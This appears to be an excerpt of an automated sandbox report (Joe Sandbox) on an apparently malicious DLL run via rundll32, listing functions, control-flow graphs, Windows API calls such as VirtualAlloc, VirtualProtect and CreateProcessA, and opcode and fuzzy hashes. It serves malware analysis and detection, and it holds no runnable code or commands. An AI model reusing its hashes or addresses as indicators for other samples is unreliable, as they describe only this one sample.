    control_flow_graph 994 10005e5f-10005e8a TerminateProcess 995 10005e99-10005eb9 CloseHandle 994->995 996 10005e8c-10005e96 call 10008f48 994->996 997 10005ec8-10005ee5 CloseHandle 995->997 998 10005ebb-10005ec5 call 10008f48 995->998 996->995 1001 10005ef4-10005f44 997->1001 1002 10005ee7-10005ef1 call 10008f48 997->1002 998->997 1002->1001
    APIs
    • TerminateProcess.KERNELBASE(00000000,00000000,?,10005668,00000000,00000000), ref: 10005E7D
    • CloseHandle.KERNEL32(00000000,?,10005668,00000000,00000000), ref: 10005EAC
    • CloseHandle.KERNEL32(00000000,?,10005668,00000000,00000000), ref: 10005ED8
    Memory Dump Source
    • Source File: 00000003.00000002.336193298.0000000010000000.00000040.00000800.00020000.00000000.sdmp, Offset: 10000000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
    Similarity
    • API ID: CloseHandle$ProcessTerminate
    • String ID:
    • API String ID: 1541851893-0
    • Opcode ID: 7c947d757b40d2b1d0a58a98e59bc80ae9684e0590784dd83700156d9b6bac4d
    • Instruction ID: 36467d162fe4f9701ac00e92914ba883088f779945990f223c5d709893f0a5e0
    • Opcode Fuzzy Hash: 7c947d757b40d2b1d0a58a98e59bc80ae9684e0590784dd83700156d9b6bac4d
    • Instruction Fuzzy Hash: 883130B4A00318EBEF00DF94D9C1B9EBB70FB0E351F1050A5EA486B356C7716A54DBA6
    Uniqueness

    Uniqueness Score: -1.00%

    Function 10004606 Relevance: 1.8, APIs: 1, Instructions: 320processCOMMON
    Download Yara Rule
    APIs
      • Part of subcall function 10005D6F: GetEnvironmentVariableA.KERNEL32(10069723,Function_0000E210,00000000), ref: 10005D98
      • Part of subcall function 10005D6F: GetEnvironmentVariableA.KERNEL32(10069723,00000000,00000000,00000000,00000001), ref: 10005E0C
    • CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,00000000,?,?,?,?,?,00000000), ref: 1000486F
    Memory Dump Source
    • Source File: 00000003.00000002.336193298.0000000010000000.00000040.00000800.00020000.00000000.sdmp, Offset: 10000000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
    Similarity
    • API ID: EnvironmentVariable$CreateProcess
    • String ID:
    • API String ID: 2302763869-0
    • Opcode ID: a21b6345c22cde698bb8e6042296a18b9237ae50acfa973f10934829fa115130
    • Instruction ID: 6bd08ba5558e1723e664c623841c749a5d5f02c338c490c126332124de29b97e
    • Opcode Fuzzy Hash: a21b6345c22cde698bb8e6042296a18b9237ae50acfa973f10934829fa115130
    • Instruction Fuzzy Hash: 35B1B8F1A402529BFF00CFA8DCC1B8977E5EF29364B291470E546AB305D778B961DB22
    Uniqueness

    Uniqueness Score: -1.00%

    Function 10004610 Relevance: 1.8, APIs: 1, Instructions: 320processCOMMON
    Download Yara Rule
    APIs
      • Part of subcall function 10005D6F: GetEnvironmentVariableA.KERNEL32(10069723,Function_0000E210,00000000), ref: 10005D98
      • Part of subcall function 10005D6F: GetEnvironmentVariableA.KERNEL32(10069723,00000000,00000000,00000000,00000001), ref: 10005E0C
    • CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,00000000,?,?,?,?,?,00000000), ref: 1000486F
    Memory Dump Source
    • Source File: 00000003.00000002.336193298.0000000010000000.00000040.00000800.00020000.00000000.sdmp, Offset: 10000000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
    Similarity
    • API ID: EnvironmentVariable$CreateProcess
    • String ID:
    • API String ID: 2302763869-0
    • Opcode ID: 1999a4e140ade5994fbc139359fbd3a3e3541bf41f421a645fe8dc29bbbb4e7d
    • Instruction ID: a6a88fea8a15b71c93179c30403b5c246083cf119354f26f4d88da3cc7a861b2
    • Opcode Fuzzy Hash: 1999a4e140ade5994fbc139359fbd3a3e3541bf41f421a645fe8dc29bbbb4e7d
    • Instruction Fuzzy Hash: 56B1B8F1A402529BFF00CFA8DCC1B8977E5EF29364B291470E546AB305D778B961DB22
    Uniqueness

    Uniqueness Score: -1.00%

    Function 1000461A Relevance: 1.8, APIs: 1, Instructions: 320processCOMMON
    Download Yara Rule
    APIs
      • Part of subcall function 10005D6F: GetEnvironmentVariableA.KERNEL32(10069723,Function_0000E210,00000000), ref: 10005D98
      • Part of subcall function 10005D6F: GetEnvironmentVariableA.KERNEL32(10069723,00000000,00000000,00000000,00000001), ref: 10005E0C
    • CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,00000000,?,?,?,?,?,00000000), ref: 1000486F
    Memory Dump Source
    • Source File: 00000003.00000002.336193298.0000000010000000.00000040.00000800.00020000.00000000.sdmp, Offset: 10000000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
    Similarity
    • API ID: EnvironmentVariable$CreateProcess
    • String ID:
    • API String ID: 2302763869-0
    • Opcode ID: 21b147d3242dff41688a4e607ccc271381ba4f9bf2a3db1154b2a9a322427d62
    • Instruction ID: 18200786322e2296e48886ba80c3c0a0571579295a8a8f8cccfe2eafa6c45a37
    • Opcode Fuzzy Hash: 21b147d3242dff41688a4e607ccc271381ba4f9bf2a3db1154b2a9a322427d62
    • Instruction Fuzzy Hash: 33B1B8F1A402529BFF00CFA8DCC1B8977E5EF29364B291470E546AB305D778B961DB22
    Uniqueness

    Uniqueness Score: -1.00%

    Function 10004624 Relevance: 1.8, APIs: 1, Instructions: 320processCOMMON
    Download Yara Rule
    APIs
      • Part of subcall function 10005D6F: GetEnvironmentVariableA.KERNEL32(10069723,Function_0000E210,00000000), ref: 10005D98
      • Part of subcall function 10005D6F: GetEnvironmentVariableA.KERNEL32(10069723,00000000,00000000,00000000,00000001), ref: 10005E0C
    • CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,00000000,?,?,?,?,?,00000000), ref: 1000486F
    Memory Dump Source
    • Source File: 00000003.00000002.336193298.0000000010000000.00000040.00000800.00020000.00000000.sdmp, Offset: 10000000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
    Similarity
    • API ID: EnvironmentVariable$CreateProcess
    • String ID:
    • API String ID: 2302763869-0
    • Opcode ID: a8e977d5e6929cacd8ac213e15fadd063f0ff8242314a0019d4a04ef5fe6b589
    • Instruction ID: 2ab24672fad017e54084c68c726b6677777c2dd61183461ce3e7d2b956ec3b11
    • Opcode Fuzzy Hash: a8e977d5e6929cacd8ac213e15fadd063f0ff8242314a0019d4a04ef5fe6b589
    • Instruction Fuzzy Hash: 42B1B8F1A402529BFF00CFA8DCC1B8977E5EF29364B291470E546AB305D778B961DB22
    Uniqueness

    Uniqueness Score: -1.00%

    Function 100045FC Relevance: 1.8, APIs: 1, Instructions: 320processCOMMON
    Download Yara Rule
    APIs
      • Part of subcall function 10005D6F: GetEnvironmentVariableA.KERNEL32(10069723,Function_0000E210,00000000), ref: 10005D98
      • Part of subcall function 10005D6F: GetEnvironmentVariableA.KERNEL32(10069723,00000000,00000000,00000000,00000001), ref: 10005E0C
    • CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,00000000,?,?,?,?,?,00000000), ref: 1000486F
    Memory Dump Source
    • Source File: 00000003.00000002.336193298.0000000010000000.00000040.00000800.00020000.00000000.sdmp, Offset: 10000000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
    Similarity
    • API ID: EnvironmentVariable$CreateProcess
    • String ID:
    • API String ID: 2302763869-0
    • Opcode ID: 3dc280fe55abc01b58db292e390aabea07e0da105420eb392ee7620be3622837
    • Instruction ID: 4fc1348e7e92fee5a10d5f52c872e9f0b591b432bef915be5527e0563184c5c5
    • Opcode Fuzzy Hash: 3dc280fe55abc01b58db292e390aabea07e0da105420eb392ee7620be3622837
    • Instruction Fuzzy Hash: 85B1A8F1A402529BFF00CFA8DCC1B8977A5EF29364B291470E546AB305D778B961DB22
    Uniqueness

    Uniqueness Score: -1.00%

    Function 1000462E Relevance: 1.8, APIs: 1, Instructions: 319processCOMMON
    Download Yara Rule
    APIs
      • Part of subcall function 10005D6F: GetEnvironmentVariableA.KERNEL32(10069723,Function_0000E210,00000000), ref: 10005D98
      • Part of subcall function 10005D6F: GetEnvironmentVariableA.KERNEL32(10069723,00000000,00000000,00000000,00000001), ref: 10005E0C
    • CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,00000000,?,?,?,?,?,00000000), ref: 1000486F
    Memory Dump Source
    • Source File: 00000003.00000002.336193298.0000000010000000.00000040.00000800.00020000.00000000.sdmp, Offset: 10000000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
    Similarity
    • API ID: EnvironmentVariable$CreateProcess
    • String ID:
    • API String ID: 2302763869-0
    • Opcode ID: 62d3435ecaf67b690040494e715479c48cb913ef0c9a276450b22e2695167ed7
    • Instruction ID: ac85400423f5c659f8c14131d3889ba6e7c23d82175b45f4af381173e65af412
    • Opcode Fuzzy Hash: 62d3435ecaf67b690040494e715479c48cb913ef0c9a276450b22e2695167ed7
    • Instruction Fuzzy Hash: BCB1B8F1A402529BFF00CFA8DCC1B8977E5EF29364B291470E546AB305D778B961DB22
    Uniqueness

    Uniqueness Score: -1.00%

    Function 10001027 Relevance: 1.8, APIs: 1, Instructions: 294networkCOMMON
    Download Yara Rule

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 2907 10001027-10001155 call 10008f42 * 3 call 10009640 call 10008f42 WSAStartup 2918 10001164-100011a0 call 10009520 2907->2918 2919 10001157-10001161 call 10008f48 2907->2919 2924 100011b1-100011b7 2918->2924 2925 100011a2 2918->2925 2919->2918 2927 100011b9 2924->2927 2928 100011be-100011eb call 10009520 2924->2928 2926 100011a4-100011a8 2925->2926 2929 100011aa-100011ad 2926->2929 2930 100011af 2926->2930 2927->2928 2933 100011fc-100011ff 2928->2933 2934 100011ed 2928->2934 2929->2926 2930->2924 2936 10001201 2933->2936 2937 10001206-10001289 call 10008f3c call 10008f42 call 10001007 2933->2937 2935 100011ef-100011f3 2934->2935 2939 100011f5-100011f8 2935->2939 2940 100011fa 2935->2940 2936->2937 2946 100012a8-100012aa 2937->2946 2947 1000128f-10001290 2937->2947 2939->2935 2940->2933 2949 100012b0 2946->2949 2950 100012da-1000132e call 10008f3c call 1000132f call 10008f3c * 3 2946->2950 2948 10001291-100012a4 call 10008f3c 2947->2948 2959 100012a6-100012a7 2948->2959 2953 100012b2-100012d8 call 10008f42 2949->2953 2953->2950 2959->2946
    APIs
    • WSAStartup.WS2_32(?,00000000), ref: 10001148
    Memory Dump Source
    • Source File: 00000003.00000002.336193298.0000000010000000.00000040.00000800.00020000.00000000.sdmp, Offset: 10000000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
    Similarity
    • API ID: Startup
    • String ID:
    • API String ID: 724789610-0
    • Opcode ID: 0b9b7ad6b27d15674f0398aaa48fba4813a74bb0a603e7b5ba06d62348bc4f8d
    • Instruction ID: d74f7e4fc3d2271a8ab4d4adfaa925da7f5db712bb5ec264062f05ece0e1d290
    • Opcode Fuzzy Hash: 0b9b7ad6b27d15674f0398aaa48fba4813a74bb0a603e7b5ba06d62348bc4f8d
    • Instruction Fuzzy Hash: 7C8184F6A402025BF740CB68DCC1BAA73E9EF583A4F290075E9059B345E679BD15C722
    Uniqueness

    Uniqueness Score: -1.00%

    Function 1000A7B0 Relevance: 16.7, APIs: 11, Instructions: 162registrystringCOMMON
    Download Yara Rule

    Control-flow Graph

    APIs
    • ??2@YAPAXI@Z.MSVCRT ref: 1000A7EE
    • strrchr.MSVCRT ref: 1000A817
    • RegOpenKeyA.ADVAPI32(00000000,00000000,?), ref: 1000A830
    • ??2@YAPAXI@Z.MSVCRT ref: 1000A853
    • RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,00000000,?,00000400,?,?,?,00000698,00000000,00000000,00000000,?), ref: 1000A876
    • ??3@YAXPAX@Z.MSVCRT ref: 1000A884
    • ??2@YAPAXI@Z.MSVCRT ref: 1000A88E
    • RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,00000000,?,?,?,?,?,?,?,00000698,00000000,00000000,00000000), ref: 1000A8AB
    • ??3@YAXPAX@Z.MSVCRT ref: 1000A8DA
    • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,00000698,00000000,00000000,00000000,?), ref: 1000A8E7
    • ??3@YAXPAX@Z.MSVCRT ref: 1000A8EE
    Memory Dump Source
    • Source File: 00000003.00000002.336193298.0000000010000000.00000040.00000800.00020000.00000000.sdmp, Offset: 10000000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
    Similarity
    • API ID: ??2@??3@$QueryValue$CloseOpenstrrchr
    • String ID:
    • API String ID: 1380196384-0
    • Opcode ID: 0055807da5042bb647736de19bf315c7cc7080262b94f7f0173f30ff330bb7ad
    • Instruction ID: b054589480694306ed07ebfcb3a54d079748cc68523788b519db9fcbf24356dc
    • Opcode Fuzzy Hash: 0055807da5042bb647736de19bf315c7cc7080262b94f7f0173f30ff330bb7ad
    • Instruction Fuzzy Hash: A04106756003055BF314DB689C45E2B77D8EFC12E0F144A2DFA55C3285EE76ED0A83A2
    Uniqueness

    Uniqueness Score: -1.00%

    Function 1000B390 Relevance: 13.6, APIs: 9, Instructions: 113librarywindowstringCOMMON
    Download Yara Rule

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 689 1000b390-1000b3ac GetModuleHandleA 690 1000b40b-1000b415 689->690 691 1000b3ae-1000b3b9 LoadLibraryA 689->691 692 1000b427-1000b45d strchr 690->692 693 1000b417-1000b425 atoi 690->693 694 1000b3eb-1000b3f9 691->694 695 1000b3bb-1000b3e8 wsprintfA MessageBoxA call 10009390 691->695 700 1000b468 692->700 701 1000b45f-1000b463 692->701 699 1000b46f-1000b47b GetProcAddress 693->699 697 1000b405-1000b406 694->697 698 1000b3fb 694->698 695->694 697->690 698->697 704 1000b4c6-1000b4db 699->704 705 1000b47d-1000b4a6 wsprintfA MessageBoxA call 10009390 699->705 700->699 701->700 703 1000b465 701->703 703->700 707 1000b4ab-1000b4c3 705->707
    APIs
    • GetModuleHandleA.KERNEL32(?), ref: 1000B3A2
    • LoadLibraryA.KERNEL32(?), ref: 1000B3AF
    • wsprintfA.USER32 ref: 1000B3C6
    • MessageBoxA.USER32(00000000,?,1006A09C,00000010), ref: 1000B3DC
      • Part of subcall function 10009390: ExitProcess.KERNEL32 ref: 100093A5
    • atoi.MSVCRT ref: 1000B41B
    • strchr.MSVCRT ref: 1000B453
    • GetProcAddress.KERNEL32(00000000,00000040), ref: 1000B471
    • wsprintfA.USER32 ref: 1000B489
    • MessageBoxA.USER32(00000000,?,1006A09C,00000010), ref: 1000B49F
    Memory Dump Source
    • Source File: 00000003.00000002.336193298.0000000010000000.00000040.00000800.00020000.00000000.sdmp, Offset: 10000000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
    Similarity
    • API ID: Messagewsprintf$AddressExitHandleLibraryLoadModuleProcProcessatoistrchr
    • String ID:
    • API String ID: 3187504500-0
    • Opcode ID: eaf7c88fcb441d378e7e4088570b6a5866bbed45d5bfb5cc9ea4a237190b3f69
    • Instruction ID: 491f2c0a62f37e4f67161009499e29b69e0f741f7a8c9d6e7004f4b75a98df72
    • Opcode Fuzzy Hash: eaf7c88fcb441d378e7e4088570b6a5866bbed45d5bfb5cc9ea4a237190b3f69
    • Instruction Fuzzy Hash: FC314AB26007555FF320EF24DC84B9B7B98EB85380F004929FB0993246EB75E909CBB5
    Uniqueness

    Uniqueness Score: -1.00%

    Function 100096A0 Relevance: 6.0, APIs: 4, Instructions: 43fileCOMMON
    Download Yara Rule

    Control-flow Graph

    APIs
    • CreateFileA.KERNELBASE(80000004,80000000,00000003,00000000,00000003,00000020,00000000,?,10001489,00000001,10069CDF,00000000,80000004,00000001), ref: 100096B5
    • GetFileSize.KERNEL32(00000000,10069CDF,?,00000268,?,10001489,00000001,10069CDF,00000000,80000004,00000001), ref: 100096CC
      • Part of subcall function 10009430: GetProcessHeap.KERNEL32(1000B517,00000008,00000002,00000000,10009825,00000007,00000003,?,?,1000261C,00000003,00000000,00000000,80000005,00000002,00000000), ref: 10009439
      • Part of subcall function 10009430: RtlAllocateHeap.NTDLL(1006A1D4,00000008,80000301), ref: 1000944D
      • Part of subcall function 10009430: MessageBoxA.USER32(00000000,10069FE8,10069FB4,00000010), ref: 10009466
    • ReadFile.KERNELBASE(00000000,00000008,00000000,?,00000000,00000001), ref: 100096F8
    • FindCloseChangeNotification.KERNELBASE(00000000), ref: 100096FF
    Memory Dump Source
    • Source File: 00000003.00000002.336193298.0000000010000000.00000040.00000800.00020000.00000000.sdmp, Offset: 10000000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
    Similarity
    • API ID: File$Heap$AllocateChangeCloseCreateFindMessageNotificationProcessReadSize
    • String ID:
    • API String ID: 4143106703-0
    • Opcode ID: 9381e33eb8e62eb59d2cf853d973df5be84e3c18288bfb382a4d906760cea2b3
    • Instruction ID: cdbe4ea1d30985889301e2374bea63683511f888104e621f128e3cfb89859431
    • Opcode Fuzzy Hash: 9381e33eb8e62eb59d2cf853d973df5be84e3c18288bfb382a4d906760cea2b3
    • Instruction Fuzzy Hash: 37F04476201310BBF3119F64DCC9FAB77BCEB84B90F104A1EF646961D5E670A5058771
    Uniqueness

    Uniqueness Score: -1.00%

    Function 10009430 Relevance: 4.5, APIs: 3, Instructions: 25memorywindowCOMMON
    Download Yara Rule

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 1007 10009430-10009437 1008 10009444-10009457 RtlAllocateHeap 1007->1008 1009 10009439-1000943f GetProcessHeap 1007->1009 1010 10009475-10009478 1008->1010 1011 10009459-10009472 MessageBoxA call 10009390 1008->1011 1009->1008 1011->1010
    APIs
    • GetProcessHeap.KERNEL32(1000B517,00000008,00000002,00000000,10009825,00000007,00000003,?,?,1000261C,00000003,00000000,00000000,80000005,00000002,00000000), ref: 10009439
    • RtlAllocateHeap.NTDLL(1006A1D4,00000008,80000301), ref: 1000944D
    • MessageBoxA.USER32(00000000,10069FE8,10069FB4,00000010), ref: 10009466
    Memory Dump Source
    • Source File: 00000003.00000002.336193298.0000000010000000.00000040.00000800.00020000.00000000.sdmp, Offset: 10000000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
    Similarity
    • API ID: Heap$AllocateMessageProcess
    • String ID:
    • API String ID: 2992861138-0
    • Opcode ID: 03d92ac7cbc8daedce1c15d98e9ff78b1ea41ed49775963adbdf35a54df7367f
    • Instruction ID: ca495d503fa8b24896a3a0ddeaa4d588f6ba14c0d85a12038cb70845f0cd2cd9
    • Opcode Fuzzy Hash: 03d92ac7cbc8daedce1c15d98e9ff78b1ea41ed49775963adbdf35a54df7367f
    • Instruction Fuzzy Hash: 59E0D8B56401317BF310FB609C49F8A7698DB057C1F014015FD05D6154E774D8018B71
    Uniqueness

    Uniqueness Score: -1.00%

    Function 100835C2 Relevance: 3.2, APIs: 2, Instructions: 209memoryCOMMON
    Download Yara Rule

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 1014 100835c2-100835e1 call 10083882 1017 100835ed-100835f4 1014->1017 1018 100835e3-100835eb 1014->1018 1020 100835f7-100835fa 1017->1020 1019 10083603-1008361d 1018->1019 1023 10083624-1008362b 1019->1023 1021 100835fc-10083600 1020->1021 1022 10083632-10083658 VirtualFree 1020->1022 1021->1019 1024 10083699-100836aa call 100837d8 1022->1024 1025 1008365a-1008365d 1022->1025 1023->1022 1027 1008362d-10083630 1023->1027 1033 100836b0-100836b5 1024->1033 1034 10083731-10083743 1024->1034 1028 1008365f-10083661 1025->1028 1027->1020 1028->1025 1030 10083663-10083669 1028->1030 1031 1008366b-1008366f 1030->1031 1032 1008367f-10083687 1030->1032 1031->1025 1035 10083671-1008367d 1031->1035 1036 10083689-10083697 1032->1036 1033->1034 1039 100836b7-100836ca 1033->1039 1037 10083784-10083793 1034->1037 1038 10083745-1008375e 1034->1038 1035->1036 1036->1024 1036->1028 1042 100837bd-100837c5 1037->1042 1043 10083795-1008379c 1037->1043 1049 10083921-10083929 1038->1049 1050 10083764-1008377d 1038->1050 1040 100836cc-100836d4 1039->1040 1041 100836d6-100836db 1039->1041 1047 100836de-100836e5 1040->1047 1041->1047 1044 100837d1-100837d2 1042->1044 1045 100837c7-100837ce 1042->1045 1048 1008379e-100837bb VirtualProtect 1043->1048 1044->1049 1051 10083707-10083710 1047->1051 1052 100836e7-100836e9 1047->1052 1048->1042 1048->1048 1050->1037 1051->1034 1053 10083712-10083715 1051->1053 1054 100836eb-100836ef 1052->1054 1055 100836f1-100836fe 1052->1055 1056 1008371f-10083721 1053->1056 1057 10083717-1008371d 1053->1057 1054->1047 1055->1054 1059 10083700-10083705 1055->1059 1060 10083724-10083727 1056->1060 1057->1053 1059->1054 1060->1034 1061 10083729-1008372f 1060->1061 1061->1060
    APIs
    • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 1008363F
    • VirtualProtect.KERNELBASE(?,?,7373652D,73736297,?,7373652D,00000000,73736297), ref: 100837AE
    Memory Dump Source
    • Source File: 00000003.00000002.336246305.0000000010080000.00000040.00000800.00020000.00000000.sdmp, Offset: 10080000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_10080000_rundll32.jbxd
    Similarity
    • API ID: Virtual$FreeProtect
    • String ID:
    • API String ID: 2581862158-0
    • Opcode ID: 5116512cfd6bf09bdea013bebf5e822baf0d3f282df84516e26171709676dcb2
    • Instruction ID: cbfd066a6669cc03ceefd0d281f04ad6062c5cf2e557b09b294620d1cb926219
    • Opcode Fuzzy Hash: 5116512cfd6bf09bdea013bebf5e822baf0d3f282df84516e26171709676dcb2
    • Instruction Fuzzy Hash: C5612572E04210AFDB21CA18CC847AAB7A1FFC5350F74C4A6D8899B391E775AD92CB50
    Uniqueness

    Uniqueness Score: -1.00%

    Function 100094C0 Relevance: 3.0, APIs: 2, Instructions: 24memoryCOMMON
    Download Yara Rule

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 1062 100094c0-100094cb 1063 10009506-10009507 1062->1063 1064 100094cd-100094d4 1062->1064 1065 100094d6 call 10009360 1064->1065 1066 100094db-100094e1 1064->1066 1065->1066 1067 100094e3-100094e9 1066->1067 1068 100094eb-100094f6 IsBadHugeReadPtr 1066->1068 1067->1063 1067->1068 1068->1063 1070 100094f8-10009500 RtlFreeHeap 1068->1070 1070->1063
    APIs
    • IsBadHugeReadPtr.KERNEL32(10009B89,00000008), ref: 100094EE
    • RtlFreeHeap.NTDLL(1006A1D4,00000000,10009B89), ref: 10009500
      • Part of subcall function 10009360: GetModuleHandleA.KERNEL32(1006A1C0,10009536,?,?,?,100081F5,00000001,?,?,?,00000000), ref: 1000936A
    Memory Dump Source
    • Source File: 00000003.00000002.336193298.0000000010000000.00000040.00000800.00020000.00000000.sdmp, Offset: 10000000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
    Similarity
    • API ID: FreeHandleHeapHugeModuleRead
    • String ID:
    • API String ID: 3105250205-0
    • Opcode ID: ca834bc4244fce640a793ff6be1dd1a44b6c0ac53575205badff9968adfb3274
    • Instruction ID: f4d6e6dfc0ea5ddfd767db067c6581f7df8aba6c1037937aeb9ef0df71b1f4fd
    • Opcode Fuzzy Hash: ca834bc4244fce640a793ff6be1dd1a44b6c0ac53575205badff9968adfb3274
    • Instruction Fuzzy Hash: 47E01231E0253297F621FB179C88A4A77D9EB477D1F014016F545A7058D374AC818FA1
    Uniqueness

    Uniqueness Score: -1.00%

    Function 00EC05A9 Relevance: 2.6, APIs: 2, Instructions: 76memoryCOMMON
    Download Yara Rule
    APIs
    • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 00EC0625
    • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 00EC0658
    Memory Dump Source
    • Source File: 00000003.00000003.311847948.0000000000EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EC0000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_3_ec0000_rundll32.jbxd
    Similarity
    • API ID: Virtual$AllocFree
    • String ID:
    • API String ID: 2087232378-0
    • Opcode ID: 8f1e82fa3ca701645e3a29dd561cede71442c6ae341de50c792d69400040f94a
    • Instruction ID: 72553b4def038dc18ac3dd899b8ea0e30eec51cf8a52fbd37e2c0d82c8691305
    • Opcode Fuzzy Hash: 8f1e82fa3ca701645e3a29dd561cede71442c6ae341de50c792d69400040f94a
    • Instruction Fuzzy Hash: 10213831A00219FFDB108FA0CC40FEEFBF5EB54394F208126E920A2280E7764A129B50
    Uniqueness

    Uniqueness Score: -1.00%

    Function 10009710 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
    Download Yara Rule

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 2968 10009710-10009720 SetFileAttributesA
    APIs
    • SetFileAttributesA.KERNELBASE(00000000,00000002,10007744,00000002,00000000,00000000,80000004,00000002,00000000,80000301,00000000,10069CE3,10069CDB,100695C2,00000000), ref: 1000971A
    Memory Dump Source
    • Source File: 00000003.00000002.336193298.0000000010000000.00000040.00000800.00020000.00000000.sdmp, Offset: 10000000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
    Similarity
    • API ID: AttributesFile
    • String ID:
    • API String ID: 3188754299-0
    • Opcode ID: 2708e965b174b85047c8d0145172c59c26a25c7f0d4e6f625563eef8cc2badcf
    • Instruction ID: ba1b9f9736472015c9caeb0e2b2585a1f4e95ecc7d51d8cd3f73c6f4105449ec
    • Opcode Fuzzy Hash: 2708e965b174b85047c8d0145172c59c26a25c7f0d4e6f625563eef8cc2badcf
    • Instruction Fuzzy Hash: 7EB092B4104201ABDA04DB10C984D2A77A8AB84280F004848B44982110C630D844CA32
    Uniqueness

    Uniqueness Score: -1.00%

    Function 10083555 Relevance: 1.3, APIs: 1, Instructions: 32memoryCOMMON
    Download Yara Rule

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 2969 10083555-10083567 2970 10083569-10083575 2969->2970 2971 1008357b-100835b1 VirtualAlloc 2969->2971 2970->2971 2972 100837bd-100837c5 2970->2972 2973 10083921-10083929 2971->2973 2974 100835b7-100835bd call 100835c2 2971->2974 2975 100837d1-100837d2 2972->2975 2976 100837c7-100837ce 2972->2976 2974->2973 2975->2973
    APIs
    • VirtualAlloc.KERNELBASE(00000000,00001000,00001000,00000040), ref: 100835A9
    Memory Dump Source
    • Source File: 00000003.00000002.336246305.0000000010080000.00000040.00000800.00020000.00000000.sdmp, Offset: 10080000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_10080000_rundll32.jbxd
    Similarity
    • API ID: AllocVirtual
    • String ID:
    • API String ID: 4275171209-0
    • Opcode ID: 249bba57007782f45bf0e84b72b43045c2c6b24cb456ac19ab3cd77c178e24dd
    • Instruction ID: 0e55dd4c9f7470d52eab4346b396aa946e407808a0d127f0e42209d590d0d6a2
    • Opcode Fuzzy Hash: 249bba57007782f45bf0e84b72b43045c2c6b24cb456ac19ab3cd77c178e24dd
    • Instruction Fuzzy Hash: 97F04F35D483688BDF61CE248C0C7D9BBB0AB40340F0144D9E9C977295D6B46EC68F54
    Uniqueness

    Uniqueness Score: -1.00%

    Non-executed Functions

    Function 1000AE00 Relevance: 27.4, APIs: 18, Instructions: 426windowstringCOMMON
    Download Yara Rule
    APIs
    • GetModuleFileNameA.KERNEL32(00000000,1006A2E0,00000104), ref: 1000AE7E
    • strrchr.MSVCRT ref: 1000AE8F
    • _ftol.MSVCRT ref: 1000AFCE
    • GetCommandLineA.KERNEL32 ref: 1000AFF4
    • PeekMessageA.USER32(00000000,00000000,00000000,00000000,00000000), ref: 1000B061
    • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 1000B093
    • TranslateMessage.USER32(?), ref: 1000B09A
    • DispatchMessageA.USER32(?), ref: 1000B0A1
    • PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 1000B0B0
    • wsprintfA.USER32 ref: 1000B2F3
    • MessageBoxA.USER32(00000000,?,1006A018,00000010), ref: 1000B30A
    Memory Dump Source
    • Source File: 00000003.00000002.336193298.0000000010000000.00000040.00000800.00020000.00000000.sdmp, Offset: 10000000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
    Similarity
    • API ID: Message$Peek$CommandDispatchFileLineModuleNameTranslate_ftolstrrchrwsprintf
    • String ID:
    • API String ID: 3335176381-0
    • Opcode ID: ecb263c5883be14fbdd7951b27c3f5027ec344516bfbf6eaecd4f87e6cf4e675
    • Instruction ID: 550dcc155c2af2a742ea6bd1faa3485fa46c40cd6c1f5de1c3546930abff5cc3
    • Opcode Fuzzy Hash: ecb263c5883be14fbdd7951b27c3f5027ec344516bfbf6eaecd4f87e6cf4e675
